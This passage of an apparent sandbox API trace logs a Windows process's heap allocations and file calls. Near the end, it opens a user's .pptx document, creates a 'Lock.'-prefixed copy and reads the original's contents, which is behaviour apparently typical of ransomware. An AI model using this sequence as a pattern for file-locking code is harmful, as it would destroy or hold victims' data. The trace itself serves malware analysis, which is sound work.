(HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16c8 [0262.362] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9708 | out: hHeap=0x25c0000) returned 1 [0262.362] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0262.362] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa080 | out: hHeap=0x25c0000) returned 1 [0262.362] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2de8 | out: hHeap=0x25c0000) returned 1 [0262.362] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa920 | out: hHeap=0x25c0000) returned 1 [0262.362] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e70 | out: hHeap=0x25c0000) returned 1 [0262.362] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1438 | out: hHeap=0x25c0000) returned 1 [0262.362] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ca8 | out: hHeap=0x25c0000) returned 1 [0262.362] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa200 | out: hHeap=0x25c0000) returned 1 [0262.362] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa050 | out: hHeap=0x25c0000) returned 1 [0262.362] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9420 | out: hHeap=0x25c0000) returned 1 [0262.362] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ed0 | out: hHeap=0x25c0000) returned 1 [0262.362] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9af8 | out: hHeap=0x25c0000) returned 1 [0262.362] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c18 | out: hHeap=0x25c0000) returned 1 [0262.362] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9648 | out: hHeap=0x25c0000) returned 1 [0262.362] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a80 | out: hHeap=0x25c0000) returned 1 [0262.362] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95d0 | out: hHeap=0x25c0000) returned 1 [0262.363] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab310 | out: hHeap=0x25c0000) returned 1 [0262.363] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0262.363] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0262.363] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a04b0 | out: hHeap=0x25c0000) returned 1 [0262.363] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0c8 | out: hHeap=0x25c0000) returned 1 [0262.363] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1e8 | out: hHeap=0x25c0000) returned 1 [0262.363] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa008 | out: hHeap=0x25c0000) returned 1 [0262.363] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa9b0 | out: hHeap=0x25c0000) returned 1 [0262.363] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9678 | out: hHeap=0x25c0000) returned 1 [0262.363] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa830 | out: hHeap=0x25c0000) returned 1 [0262.363] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9570 | out: hHeap=0x25c0000) returned 1 [0262.363] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fc0 | out: hHeap=0x25c0000) returned 1 [0262.363] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d80 | out: hHeap=0x25c0000) returned 1 [0262.363] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0b0 | out: hHeap=0x25c0000) returned 1 [0262.363] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cc0 | out: hHeap=0x25c0000) returned 1 [0262.363] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8a8 | out: hHeap=0x25c0000) returned 1 [0262.363] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa278 | out: hHeap=0x25c0000) returned 1 [0262.363] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ab0 | out: hHeap=0x25c0000) returned 1 [0262.364] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7e8 | out: hHeap=0x25c0000) returned 1 [0262.364] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1a0 | out: hHeap=0x25c0000) returned 1 [0262.364] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a96d8 | out: hHeap=0x25c0000) returned 1 [0262.364] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa950 | out: hHeap=0x25c0000) returned 1 [0262.364] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa158 | out: hHeap=0x25c0000) returned 1 [0262.364] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1b8 | out: hHeap=0x25c0000) returned 1 [0262.364] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0262.364] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0262.364] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c28 [0262.364] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1b8 [0262.364] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa158 [0262.364] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2bb8 [0262.364] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0262.364] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa950 [0262.364] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2bb8 [0262.364] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a96d8 [0262.364] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1a0 [0262.364] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1438 [0262.365] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa7e8 [0262.365] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1438 | out: hHeap=0x25c0000) returned 1 [0262.365] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7e8 | out: hHeap=0x25c0000) returned 1 [0262.365] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1a0 | out: hHeap=0x25c0000) returned 1 [0262.365] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a96d8 | out: hHeap=0x25c0000) returned 1 [0262.365] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0262.365] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a96d8 [0262.365] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2bb8 [0262.365] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0262.365] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa158 | out: hHeap=0x25c0000) returned 1 [0262.365] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa950 | out: hHeap=0x25c0000) returned 1 [0262.365] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a96d8 | out: hHeap=0x25c0000) returned 1 [0262.365] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1b8 | out: hHeap=0x25c0000) returned 1 [0262.365] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0262.365] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8a0 | out: hHeap=0x25c0000) returned 1 [0262.365] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a8dc0 | out: hHeap=0x25c0000) returned 1 [0262.365] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fa8 | out: hHeap=0x25c0000) returned 1 [0262.365] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c60 | out: hHeap=0x25c0000) returned 1 [0262.366] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0262.366] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a08 | out: hHeap=0x25c0000) returned 1 [0262.366] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0e0 | out: hHeap=0x25c0000) returned 1 [0262.366] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0262.366] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249f1d0 | out: hHeap=0x25c0000) returned 1 [0262.366] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2060 | out: hHeap=0x25c0000) returned 1 [0262.366] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2080 | out: hHeap=0x25c0000) returned 1 [0262.366] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466db0 | out: hHeap=0x25c0000) returned 1 [0262.366] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e10 | out: hHeap=0x25c0000) returned 1 [0262.366] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6cb0 | out: hHeap=0x25c0000) returned 1 [0262.366] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2c18 | out: hHeap=0x25c0000) returned 1 [0262.366] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ba0 | out: hHeap=0x25c0000) returned 1 [0262.366] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f60 | out: hHeap=0x25c0000) returned 1 [0262.366] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c90 | out: hHeap=0x25c0000) returned 1 [0262.366] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0262.366] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b56a8 | out: hHeap=0x25c0000) returned 1 [0262.366] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e40 | out: hHeap=0x25c0000) returned 1 [0262.366] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f30 | out: hHeap=0x25c0000) returned 1 [0262.366] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9de0 | out: hHeap=0x25c0000) returned 1 [0262.367] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa128 | out: hHeap=0x25c0000) returned 1 [0262.367] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa248 | out: hHeap=0x25c0000) returned 1 [0262.367] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c78 | out: hHeap=0x25c0000) returned 1 [0262.367] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e30 | out: hHeap=0x25c0000) returned 1 [0262.367] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2150 | out: hHeap=0x25c0000) returned 1 [0262.367] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0288 | out: hHeap=0x25c0000) returned 1 [0262.367] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9a68 | out: hHeap=0x25c0000) returned 1 [0262.367] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6bc0 | out: hHeap=0x25c0000) returned 1 [0262.367] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0262.367] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c38 | out: hHeap=0x25c0000) returned 1 [0262.367] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acc60 | out: hHeap=0x25c0000) returned 1 [0262.367] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b64e0 | out: hHeap=0x25c0000) returned 1 [0262.367] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0262.367] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b48 | out: hHeap=0x25c0000) returned 1 [0262.367] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e28 | out: hHeap=0x25c0000) returned 1 [0262.367] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c10 | out: hHeap=0x25c0000) returned 1 [0262.367] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1838 | out: hHeap=0x25c0000) returned 1 [0262.367] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6508 | out: hHeap=0x25c0000) returned 1 [0262.367] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa740 | out: hHeap=0x25c0000) returned 1 [0262.368] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b70 | out: hHeap=0x25c0000) returned 1 [0262.368] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0262.368] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6aa8 | out: hHeap=0x25c0000) returned 1 [0262.368] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9288 | out: hHeap=0x25c0000) returned 1 [0262.368] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c88 | out: hHeap=0x25c0000) returned 1 [0262.368] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2415a48 | out: hHeap=0x25c0000) returned 1 [0262.368] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6d00 | out: hHeap=0x25c0000) returned 1 [0262.368] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e58 | out: hHeap=0x25c0000) returned 1 [0262.368] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18b8 | out: hHeap=0x25c0000) returned 1 [0262.368] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1868 | out: hHeap=0x25c0000) returned 1 [0262.368] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac9f0 | out: hHeap=0x25c0000) returned 1 [0262.368] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa878 | out: hHeap=0x25c0000) returned 1 [0262.368] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0262.368] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18e8 [0262.368] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0262.368] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0262.368] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0262.368] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18e8 [0262.369] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acde0 [0262.369] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d38 [0262.369] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1868 [0262.369] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa140 [0262.369] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents/G0mzKIgpl5aj2M-.pptx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\g0mzkigpl5aj2m-.pptx"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x294 [0262.370] SetFilePointerEx (in: hFile=0x294, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0262.370] SetFilePointerEx (in: hFile=0x294, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x8bf2c8 | out: lpNewFilePointer=0x0) returned 1 [0262.370] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14) returned 0x2466e30 [0262.370] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0262.370] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1428 [0262.370] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0262.370] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0262.370] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1428 [0262.370] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c00 [0262.370] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab328 [0262.370] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18e8 [0262.370] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acde0 [0262.370] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents/Lock.G0mzKIgpl5aj2M-.pptx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\lock.g0mzkigpl5aj2m-.pptx"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x268 [0262.371] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14) returned 0x2466db0 [0262.371] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0262.371] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1828 [0262.372] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0262.372] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0262.372] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d820 [0262.372] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0262.372] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1828 [0262.372] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa908 [0262.372] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa230 [0262.372] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1428 [0262.372] SetFilePointerEx (in: hFile=0x294, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x8bf4ec | out: lpNewFilePointer=0x0) returned 1 [0262.372] ReadFile (in: hFile=0x294, lpBuffer=0x3551008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8bf500, lpOverlapped=0x0 | out: lpBuffer=0x3551008*, lpNumberOfBytesRead=0x8bf500*=0x10000, lpOverlapped=0x0) returned 1 [0262.376] ReadFile (in: hFile=0x294, lpBuffer=0x3551008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8bf500, lpOverlapped=0x0 | out: lpBuffer=0x3551008*, lpNumberOfBytesRead=0x8bf500*=0x3626, lpOverlapped=0x0) returned 1 [0262.377] ReadFile (in: hFile=0x294, lpBuffer=0x3551008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8bf500, lpOverlapped=0x0 | out: lpBuffer=0x3551008*, lpNumberOfBytesRead=0x8bf500*=0x0, lpOverlapped=0x0) returned 1 [0262.378] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0262.378] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1428 [0262.379] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b70 [0262.379] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f90 [0262.379] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1828 [0262.379] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18b8 [0262.379] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x13626) returned 0x24b7a48 [0262.379] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0262.379] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1428 [0262.379] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18b8 [0262.379] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466d90 [0262.379] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0262.379] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1428 [0262.379] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6d00 [0262.379] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18b8 [0262.379] CharUpperBuffW (in: lpsz="A6000504F44", cchLength=0xb | out: lpsz="A6000504F44") returned 0xb [0262.379] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6d00 | out: hHeap=0x25c0000) returned 1 [0262.379] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18b8 | out: hHeap=0x25c0000) returned 1 [0262.379] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b70 [0262.379] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b18b8 [0262.380] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f90 [0262.380] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa908 [0262.380] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1828 [0262.380] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0262.380] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x13626) returned 0x24b7a48 [0262.380] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1828 | out: hHeap=0x25c0000) returned 1 [0262.380] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b1828 [0262.380] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c00 [0262.380] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1838 [0262.380] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1838 | out: hHeap=0x25c0000) returned 1 [0262.380] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b1838 [0262.380] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa230 [0262.380] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16b8 [0262.380] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0262.380] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b16b8 [0262.380] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa860 [0262.380] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2da8 [0262.380] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0262.380] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24ab328 [0262.380] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6d00 [0262.381] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acde0 [0262.381] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2da8 [0262.381] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acde0 | out: hHeap=0x25c0000) returned 1 [0262.381] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c88 [0262.381] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acde0 [0262.381] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1778 [0262.381] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x13626) returned 0x24de6a8 [0262.382] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6aa8 [0262.382] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa140 [0262.382] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2c18 [0262.382] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa140 | out: hHeap=0x25c0000) returned 1 [0262.382] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6b70 [0262.382] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa140 [0262.382] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6508 [0262.382] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac9f0 [0262.382] 